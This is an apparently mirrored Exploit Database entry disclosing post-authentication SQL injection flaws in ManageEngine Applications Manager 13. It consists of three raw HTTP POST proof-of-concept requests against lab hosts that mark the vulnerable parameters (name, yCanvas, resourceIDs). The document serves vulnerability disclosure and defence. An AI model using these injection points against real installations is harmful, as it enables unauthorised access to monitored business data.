ManageEngine Applications Manager 13 – SQL Injection

• Exploit Database
• 18 阅读

• 作者： Cody Sixteen
  日期： 2017-11-07
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43129/

• ManageEngine Applications Manager version 13 suffers from multiple post-authentication SQL injection vulnerabilities.
  
  
  Proof of Concept 1 (name= parameter is susceptible):
  
  POST /manageApplications.do?method=insert HTTP/1.1
  Host: 192.168.1.190:9090
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,pl;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 407
  Referer: http://192.168.1.190:9090/admin/createapplication.do?method=createapp&grouptype=1
  Cookie: testcookie=; am_username=; am_check=; liveapm-_zldp=IEKA1hnqJESNNXc4I4Ts1omY%2FiCOo47Ch6sZEoC7bRr4SfuGTOVfjv2JZAH6cun8; liveapm-_zldt=cfa03604-1dc4-4155-86f7-803952114141; diagnosticsAlarmTable_sortdir=down; JSESSIONID_APM_9090=A16B99B2C0C09EB6060B4372660CFBC3
  Connection: close
  Upgrade-Insecure-Requests: 1
  
  org.apache.struts.taglib.html.TOKEN=66ef9ed22c8b3a67da50e905f7735abd&addmonitors=0&name=My+App2&description=Description....This+service+is+critical+to+our+business&grouptype=1&mgtypestatus%231001=on&mgtypes_1001=1&mgtypes_1007=0&mgtypes_1008=0&mgtypestatus%231002=on&mgtypes_1002=1&mgtypestatus%231003=on&mgtypes_1003=1&mgtypestatus%231004=on&mgtypes_1004=1&mgtypestatus%231006=on&mgtypes_1006=1&locationid=
  
  
  Proof of Concept 2 (crafted viewProps yCanvas field):
  
  POST /GraphicalView.do? HTTP/1.1
  Host: 192.168.1.191:9090
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: en-US,pl;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Referer: http://192.168.1.191:9090/GraphicalView.do?&method=createBusinessService
  Content-Length: 457
  Cookie: JSESSIONID_APM_9090=53E8EBC71177607C3A7FE03EB238887E
  Connection: close
  
  &method=saveBusinessViewPropsForADDM&viewProps={"displayProps":{"showLabel":true,"showOnlyMGs":false,"showOnlyTopMGs":false,"showOnlyCritical":false,"showOnlyMGStatus":false,"backgroundColorVal":"#FFFFFF","lineColorVal":"#888c8f","textColorVal":"#444444","lineThickness":"2.5","lineTransparency":1,"xCanvas":-23.089912210349002,"yCanvas":0},"coordinates":"{\"totalNumberOfNodes\":0,\"nodeIdList\":[]}"}&haid=10000106&nodeIdVsResourceId={"node_1":"10000106"}
  
  
  Proof of Concept 3:
  
  POST /GraphicalView.do HTTP/1.1
  Host: 192.168.1.191:9090
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
  Accept: application/json, text/javascript, */*; q=0.01
  Accept-Language: en-US,pl;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Referer: http://192.168.1.191:9090/showapplication.do?haid=10000106&method=showApplication&selectM=flashview&viewid=1
  Content-Length: 101
  Cookie: JSESSIONID_APM_9090=68C19C45D63C6FD102EB3DF25A8CE39D; testcookie=; am_username=; am_check=; am_mgview=availability
  Connection: close
  
  method=getLatestStatusForJIT&haid=10000106&viewid=1&currentime=1509869908111&resourceIDs=(0000106,0)